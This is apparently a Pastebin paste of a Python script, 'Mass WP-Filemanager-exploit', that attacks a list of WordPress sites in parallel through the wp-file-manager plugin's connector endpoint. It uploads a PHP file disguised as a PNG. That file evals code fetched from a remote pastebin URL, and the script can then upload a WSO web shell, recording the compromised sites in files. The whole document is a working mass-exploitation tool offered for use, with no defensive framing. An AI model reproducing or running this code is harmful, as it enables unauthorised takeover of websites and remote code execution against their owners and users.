API tools faq
paste
Fadly31337

Mass WP-Filemanager-exploit

Fadly31337
Sep 18th, 2020
202
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.06 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. import requests
  3. import sys
  4. import os
  5. import re
  6. from multiprocessing import Pool
  7. from multiprocessing.dummy import Pool as ThreadPool
  8. from colorama import *
  9. import time
  10. from colorama import Fore
  11. from colorama import Style
  12. from colorama import init
  13.  
  14. init()
  15. fr  =   Fore.RED
  16. fc  =   Fore.CYAN
  17. fw  =   Fore.WHITE
  18. fg  =   Fore.GREEN
  19. fm  =   Fore.MAGENTA
  20.  
  21. banner = """\033[00m__        ______    _____ _ _
  22. \ \     / /  _ \ |  ___(_) | ___ _ __ ___   __ _ _ __   __ _  __ _  ___ _ __
  23. \ \ /\ / /| |_) | | |_  | | |/ _ \ '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__|
  24.  \ V  V / |  __/  |  _| | | |  __/ | | | | | (_| | | | | (_| | (_| |  __/ |
  25.   \_/\_/  |_|     |_|   |_|_|\___|_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_|
  26.                                              (\033[93mc\033[00m) Bastard_c0de |___/"""                                                              
  27. red        = '\033[31m'
  28. green      = '\033[32m'
  29. yellow     = '\033[93m'
  30. white      = '\033[00m'
  31.  
  32. def clear():
  33.     linux   = 'clear'
  34.     windows = 'cls'
  35.     os.system([linux, windows][os.name == 'nt'])
  36. clear()
  37.  
  38. def get_url(url):
  39.     try:
  40.         if "://" in url:
  41.             url = url
  42.         else:
  43.             url = "http://" + url
  44.         if url.endswith("/"):
  45.             url = url[:-1]
  46.         headers ={"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36","Accept": "*/*","Content-Type": "multipart/form-data; boundary=------------------------66e3ca93281c7050","Expect": "100-continue","Connection": "close"}
  47.         data = "--------------------------66e3ca93281c7050\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n--------------------------66e3ca93281c7050\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n--------------------------66e3ca93281c7050\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"uploader.php\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01^\x00\x00\x01^\x04\x03\x00\x00\x00?\x05j)\x00\x00\x00\x1ePLTE\xff\xff\xff\xef\xef\xef\xe5\xe5\xe5\xce\xce\xce\xa1\xa1\xa1iiiVVVGGG333\x00\x00\x00g\x00\xcc\xe2\x00\x00\r\xc0IDATx\xda\xed]K[\xdb\xc8\x12m\xc9\xce^\xc6\x90\xbb58\t\xdc\x9dm\x9c\t\xd9\xd9X\x1e\xc2\x8e\x87I\xc22\t!\x93\xe5@xmc\x02\xf1\xda\x0f\xa9\xff\xed]`\xeb\xddVU\xc9C\xb5\xe6\xa2-\xd4\xa7\xf2Q\xe9\xa8\x1fuN\x8b\xdf\xb9\xba\xee\x84\xbc\"^\xd7\x83\xc7\x8f\xbc\x9a\x08\xa7\xb1F\xbb\xaa\x97\xf4\xc8:5\xf2^L,A\xbb\x8cSr\xe4\x055\xd2\xbc\x17\x0eC\xbe\xe4H\xf3NL*\x8f\x8f\xd2i\xbe\xf05Y\xf05\xffM\xf5[*\x95J\xb9\xc1\xb7\xdc\xb4\x8f\xde\x9f\x1e\xf5\xec\x86\x95\x83\xfa\xadv\xff\x92\xd3\xcb\xfd\xba]\xd1\x86\x1f\x92Q2\xeck\x19\xb8\xdc\x93FB\xa4>\xf5[\xde\x91\x91k\xd2\xd1\x18\xdf\xeaG\x19\xbb\xdcCK\xd7\xfa-\x97\x12\x90\xb0.\xfcP>\x9629a-\xf9\xd7\xdc\x95\x8a\xcb\xdd\xd6\x11\xdf\x1d\xa9\xbc&5\xfd\xea\xf7\xe5@\x9d\xaf\xbc\xad\xe8\xc6\x0f\x85c9\xef:\xd0\x8c\x8d\x9d\xb9\xe9J\xa7\xa6\x17\xbe\xcb\x83\xf9\xf9\xca[\xad\xea\xd7\xd8MIW\xba-\x9d\xf8\xe1\x85L\xbdn-}\xf87\x1d^)eK\x1f|\x97\x01\xe9\xfa\x15\xcc_\xbf\x10x\xa5[\xd3\x85\x1f\n\x03H\xbe\xf2\\\x17\xfe}\x03JW\x8e+z\xe0k\x1c\xc3\xf2\x95m=\xea\xb7\x08LW\x8e\xf4\xe0\x87-h\xbe\xd3{1\xf3\xaf\t-\x07)\xf7t\xc0\x17\\\x0eR\xf6u\xa8\xdfux\xbe\x0f\x8b\xb7\xbc\xfc\x00\xfa\x16\x87\xbe\xc9\xbc\xfc\x0b\xfcX<\\\x9f\xf8\xf1E\x94\xef\x94\xd1x\xeb\xf7\r&\xdf\xb1\xc5\xce\x0f\x98\xf2\x95\xb2\xc6\xcd\xbf\xc6wT\xbe\xfb\xdc\xf8\x16P\xe9\xca\x9f\xdc\xf5\xbb\x8c\xcbw\xc4\xcd\x0f\x1b\xb8|\xc7\x163\xff\xbe\xc5\xe5\xeb\xd6x\xf15p\xf4 e\x8b\xb7~\x91\xf4 e\x9b\x97\x1f\xcc\x012\xdf\xbfy\xf9\x17IgR\xf6y\xf1]\xc6\xe6;\xe4\xad\xdfg\xd8|G\x16+?\xac`\xf3\x1d\xf3\xf2\xef::_^|\xb7\xb0\xf9:\x16k\xfd\xbe\xc5\xe6\xebV\xb2\xf0Yf|\xf1\xf9\xd6X\xf1\xc5~\x8e\xa5\xcc\x19\xbe2o\xf8\xd6\x84q\xc9\x87/%_\xf3k\x8e\xf8![=<>\xbe\xcc\xfc@\xe13\xce\xef\x1b\xe5{\xc1\x89\xef\x066\xdf\t/\xffR\xc6;\x9c\xf8\xaeP\xc6\xbf\x8c\xf8\xe2\xc7\xeb\xbc\xf3\x8b\"z>\xc4\x8b\xef#\xcf73\xe3\x8b\x9e\xcf\x12\xac\xf8\x1a\xc7\xc8|\x99\xd7w\x04a=\x8a\x13_\xf4z_\x85\x19\xdfW\xf8\xf5T\xce\xf1/e\xbd\x9as\xfc\x8b%\xb43\xc1\x8c/\x92 \xf6\xd8\xf7\xe7\xf1\xfbY\xbc\xfbo\xaf\xb0\xaf\x1b\xf3\xfe&j\x041\x14\xec\xfb\xc7\xe6\r\"\xdf\x03\xc1\xdf\x1f\xb5\x8b,_\xee\xfe(D\x01?tt1\xf7\x97<f?\xccB\xfa\xa3\x8e1\x83\x1d\r\xfaS\xd7\x11sc\x1d\xf0-\xe2\xca\x81\xbd\xbf\x0f\xbc'\xdb\x8eF\xf2\xe0+\xfe\xc0\xf5{\xb2\xf7\xa7\x16`\x9f\x8c\xcfB\x13|\xc5;\xd0\xcePM\xe8Q\xbfB\x14\x07\xf0\xb7M\x0b}\x00\xe0\x8ds\xeb\xde/\xe5\xd7\xb7,\xa7\x03|+4\xc2\xd7H\xad`\xb7\xb6\x88|\x17\xa6\x1fJ\xad\xe0sK\x11\xc9\x82o*\x07\x8f\x03z'-\xf4\xb1)z\xb2mu$\x0f\xbe\xf3_\xb9\x1f\xd6\x9cH\x16|\x85x\x9d\xfe%\xd6\x86\x1f\x84\x10\xc2Tr\xc4\xa4\x1d\xfe\xa5\x9a\xe8\xbb\x0b\xef@\xf2X}\xfc\t\xca\x1f\x93\xd3]\x9c^z\xc1\xfa\xf9$\x84\x9d\x8e\x05\x88d\xc1W\x88\xa5n\x94%~m\xc7#5\xf2\xd70\x9a\xa1\x9apz\x15h$\x0b\xbeB\x88B\xf3\xc3\x0c\xe3\xbb^\x03\x13\xc9\x81\xaf\x10B\x946\xedn\xf7\xa8kw\xd6p\xbf\x94\x07\xdfi\xceB\xfd\xd7\xbc\xf9\x1b\xe5\xcd'o\xfeFF\xde\xf0\xfd\xf2\xe7rVK\xb4k\xe9\xb4B\x8d\xbc\xa4\xde\xb3p/\xdc\xafG\xb4\xeb\xfd\xe0\xe8\xf1#'B\xdeS\xbd\xf4\xe45\xd5\xbf\xcf\xa5\xde\xf3\xda\x11\x0e\xd9K\xef\x94\x1c\xf9m\x8d\x1ay\x97\xb3\xf7\xed>\x83\x1f\xde\xd3\xf7\xed\xe9\xfb\xf6\xf4}\x8b\xfcimssss\xcd\xcaE\xfd\x1ae\xfb\xfd\xf5@J\xf7\xfe\xc8n\xe8?\xfe-\x07\xad\xf4\xeez\xab\xda\xe0\x9b<\xbfhF\x16/~u,\x8d\xf15^\x0f\xe26o\x15m\xeb\xd7\xf83ie(\xb6\x18\xa0\x0b?$\xa7+e\xcf\xd2\x92\r\xe5Rl\xc4\xaaP\x13|\xd5\xd6t\xee\xbe\x86\xf5[\x9c\xb3\x9d\xeb\xd4\xb5\xe3\x07s\xeef\xe3\xa8\xa2\x1b\xff\xbe\x9e\xbf\xb3t\xa8\x19\xbei\x9b\xfbA/H\x1d\xea\xf7\x1d|#W\x07~H\xdf\xda\x0f:\xff\xf1\xf3/\xa0u\xe2V#|!\x9d\x13>\xc0\xfc\xf5\xfbN\xa2:=\xb8\xf9\x01\xd6\xf9\xe3\xf5\"\xb0\xf3/\xb0\xf7\xf2\xb3&\xf8B\x9b\xc9\xc7\x96\x1e\xf5\x0b\xee\x0cl\xe9<?php @eval(\"?>\".file_get_contents(\"https://pastebin.com/raw/nfQw76u1\"));?>\r\n--------------------------66e3ca93281c7050--\r\n"
  48.         getme = requests.post(url + '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',headers=headers,data=data,timeout=15)
  49.         if getme.status_code == 200:
  50.             ckme = requests.get(url + '/wp-content/plugins/wp-file-manager/lib/files/uploader.php?id=1337')
  51.             if "The3x" in ckme.text:
  52.                 print(white + "[" + yellow + "+" + white + "] " + url + green + " -> Uploader OK!")
  53.                 open("Result_uploader.txt", "a").write(url + '/wp-content/plugins/wp-file-manager/lib/files/uploader.php?id=1337\n')
  54.                 if shellup == "Y" or shellup == "y":
  55.                     file = {'files': open('wso.php','rb')}
  56.                     req = requests.post(url + '/wp-content/plugins/wp-file-manager/lib/files/uploader.php?id=1337', files=file)
  57.                     get = re.findall("<h1><a href='(.*?)'>Done! Open</a></h1>", req.text)
  58.                     name = get[0]
  59.                     if name != "":
  60.                         url = url + "/wp-content/plugins/wp-file-manager/lib/files/uploader.php?id=1337"
  61.                         gg = url.split("/")
  62.                         remove = gg[len(gg) - 1]
  63.                         final = url.replace(remove, name)
  64.                         print(white + "[" + yellow + "+" + white + "] " + final + green + " -> Shell OK!")
  65.                         open('Result_shell.txt', 'a').write(final + "\n")
  66.             else:
  67.                 print(white + "[" + yellow + "-" + white + "] " + url + red + " -> Failed!")
  68.         else:
  69.             print(white + "[" + yellow + "-" + white + "] " + url + red + " -> Failed!")
  70.     except:
  71.         pass
  72.  
  73. if 1 == 1:
  74.     try:
  75.         print(banner)
  76.         listshell  = raw_input(white + "[" + yellow + "#" + white + "] Website list [ex:list.txt] : ")
  77.         thread     = input(white + "[" + yellow + "#" + white + "] Threads [ex:20] : ")
  78.         shellup    = raw_input(white + "[" + yellow + "#" +white + "] Upload WSO Shell? [Y/n] : ")
  79.         try:
  80.             with open(listshell, 'r') as get:
  81.                 read = get.read().splitlines()
  82.         except IOError:
  83.             pass
  84.         read = list((read))
  85.         try:
  86.             pp = ThreadPool(thread)
  87.             pr = pp.map(get_url, read)
  88.         except:
  89.             pass
  90.     except:
  91.         pass
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!